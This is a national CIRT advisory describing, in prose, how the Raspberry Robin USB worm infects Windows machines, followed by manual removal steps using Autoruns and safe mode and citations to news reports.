Description
Researchers from Red Canary have discovered a new malware native to Windows OS with worm like capabilities. The malware is said to be spread by means of removable USB.
Summary
The worm uses Windows Installer to contact QNAP-related domains and download a malicious DLL. Infections were first discovered in firms with ties to the technology and industry sectors in September 2021, according to reports.
How it works
Connecting an infected USB device to a Windows PC is the first step in a Raspberry Robin attack chain. The worm payload is present on the device and appears as a .LNK shortcut file to a valid folder.
The worm then uses cmd.exe to start a new process that reads and executes a malicious file on the external device.
Then explorer.exe and msiexec.exe are launched, with the latter being utilized for external network communication to a rogue domain for command-and-control (C2) functions as well as downloading and installing a DLL library file.
After that, a series of genuine Windows tools such as fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe are used to load and execute the malicious DLL, effectively circumventing User Account Control (UAC). It is suspected that the malicious DLL is installed to establish persistence on an infected system
Remediation
Here are a few steps you can follow if you are or suspect that you are infected with this malware:
Download Autoruns. This is a program that will show all auto-start applications, Registry, and file system locations. You can download the program from this link: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
Restart your computer in safe mode. You can learn how to do this at the following link: https://www.bitdefender.com/consumer/support/answer/2129/
Extract the downloaded archive and run the Autoruns.exe file.
In the Autoruns application, click “Options” at the top and uncheck “Hide Empty Locations” and “Hide Windows Entries” options. After this procedure, click the “Refresh” icon.
Check the list provided by the Autoruns application and locate the malware file that you want to eliminate.
You should write down its full path and name. Note that some malware hides process names under legitimate Windows process names. At this stage, it is very important to avoid removing system files. After you locate the suspicious program you wish to remove, right click your mouse over its name and choose “Delete”.
After removing the malware through the Autoruns application (this ensures that the malware will not run automatically on the next system startup), you should search for the malware name on your computer. Be sure to enable hidden files and folders before proceeding. If you find the filename of the malware, be sure to remove it.
Reboot your computer in normal mood.
The Guyana National CIRT recommends that users and administrations review this alert and apply it where necessary.
PDF Download: Raspberry Robin Malware Spreading via External Drives.pdf
References
Gatlan, Sergiu. (5th May 2022). New Raspberry Robin worm uses Windows Installer to drop malware. Retrieved from Bleeping Computer. https://www.bleepingcomputer.com/news/security/new-raspberry-robin-worm-uses-windows-installer-to-drop-malware/
Lakshmanan, Ravie. (6th May 2022). Researchers Warn of “Raspberry Robin” Malware Spreading via External Drives. Retrieved from The Hacker News. https://thehackernews.com/2022/05/researchers-warn-of-raspberry-robin.html